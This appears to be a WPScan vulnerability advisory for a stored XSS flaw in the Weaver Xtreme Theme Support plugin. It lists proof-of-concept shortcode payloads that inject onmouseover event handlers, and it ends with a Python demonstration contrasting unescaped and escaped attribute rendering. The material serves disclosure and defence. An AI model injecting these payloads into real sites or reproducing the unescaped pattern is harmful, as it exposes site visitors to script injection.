wpvulndb | Lana Codes | WPVDB-ID: D00824A3-7DF5-4B52-A31B-5FDFB19C970F
History: Mar 29, 2023 - 12:00 a.m.

Weaver Xtreme Theme Support < 6.2.7 - Contributor+ Stored XSS

Published: 2023-03-29 00:00:00
Author: Lana Codes
Source: wpscan.com
Tags: wordpress, theme, xss, contributor role, stored xss, security vulnerability, shortcode attributes

EPSS: 0.001 (Low), Percentile: 23.7%

The plugin does not validate and escape some of its shortcode attributes before outputting them back in the page or post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.

PoC

Required theme: https://wordpress.org/themes/weaver-xtreme

[box background='red" onmouseover="alert(/XSS-background/)"']
Other affected attributes (found when verifying the issue): border_rule, border_radius, color, margin, padding, style

Other affected shortcodes identified when verifying the issue:

[bloginfo style='"onmouseover=alert(/XSS-style/)//']

[div id='"onmouseover=alert(/XSS-id/)//']
Other affected attributes: class, style

[span id='"onmouseover=alert(/XSS-id/)//']
Other affected attributes: class, style

[header_image style='"onmouseover=alert(/XSS-style/)//']
Other affected attributes: h, w

[html args='onmouseover=alert(/XSS-args/) style=display:block;width:100px;height:100px;background:red']

[iframe src='"onmouseover=alert(/XSS-src/)//']
[iframe src='1' height='"onmouseover=alert(/XSS-height/)//']
Other affected attributes: percent, style

[site_tagline style='"onmouseover=alert(/XSS-style/)//']

[site_title style='"onmouseover=alert(/XSS-style/)//']

[vimeo id='"onmouseover=alert(/XSS-id/)//']
[vimeo id='1' color='"onmouseover=alert(/XSS-color/)//']
Other affected attributes: percent

[youtube id='"onmouseover=alert(/XSS-id/)//']
[youtube id='1' autohide='"onmouseover=alert(/XSS-autohide/)//']
Other affected attributes: color, color1, color2, end, fs, iv_load_policy, origin, percent, playlist, rel, showinfo, start, wmode
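As an added illustration (not code from the advisory, WPScan or the theme), the Python below rebuilds the defect the description reports: a shortcode attribute value interpolated into an HTML attribute without escaping, placed beside the escaped form, with both outputs checked by a real HTML parser rather than a naive regex. `parse_atts`, `render_box_vulnerable`, `render_box_fixed` and the mapping of `background` to an inline style are assumptions standing in for the theme's real shortcode handler; `html.escape(quote=True)` plays the role WordPress's `esc_attr()` plays in a fix.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample in the shape of the advisory's box PoC: a single-quoted shortcode
# attribute whose value contains a double quote followed by an event-handler attribute.
SAMPLE_POST = "[box background='red\" onmouseover=\"alert(/XSS-background/)\"']text[/box]"

# Hypothetical stand-in for WordPress's shortcode_parse_atts(): accepts name="v", name='v'
# or bare name=v. A single-quoted value may legitimately contain double quotes.
ATTR_RE = re.compile(r"""(\w+)=(?:"([^"]*)"|'([^']*)'|(\S+))""")

def parse_atts(shortcode: str) -> dict:
    inner = shortcode[1:shortcode.index("]")]  # text between "[" and the first "]"
    atts = {}
    for m in ATTR_RE.finditer(inner):
        atts[m.group(1)] = next(g for g in m.groups()[1:] if g is not None)
    return atts

def render_box_vulnerable(atts: dict) -> str:
    # The pattern the advisory describes: the value is written verbatim into an HTML
    # attribute, so a '"' inside it closes the attribute and the rest becomes new attributes.
    return f'<div style="background:{atts.get("background", "")}">text</div>'

def render_box_fixed(atts: dict) -> str:
    # html.escape(quote=True) encodes & < > " ' (the same job as esc_attr()), so the
    # value cannot leave the style attribute whatever it contains.
    value = html.escape(atts.get("background", ""), quote=True)
    return f'<div style="background:{value}">text</div>'

class _AttrCollector(HTMLParser):
    """Collects every (name, value) attribute pair a browser would see on start tags."""
    def __init__(self):
        super().__init__()
        self.attrs = []

    def handle_starttag(self, tag, attrs):
        self.attrs.extend(attrs)

def event_handlers(markup: str) -> list:
    """Names of on* attributes present after real HTML parsing; a regex would still
    'see' onmouseover inside the escaped, harmless attribute value."""
    parser = _AttrCollector()
    parser.feed(markup)
    return [name for name, _ in parser.attrs if name.startswith("on")]

if __name__ == "__main__":
    atts = parse_atts(SAMPLE_POST)
    print("vulnerable:", event_handlers(render_box_vulnerable(atts)))  # ['onmouseover']
    print("fixed:     ", event_handlers(render_box_fixed(atts)))       # []
```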

CPE Name               Operator  Version
weaverx-theme-support  lt        6.2.7

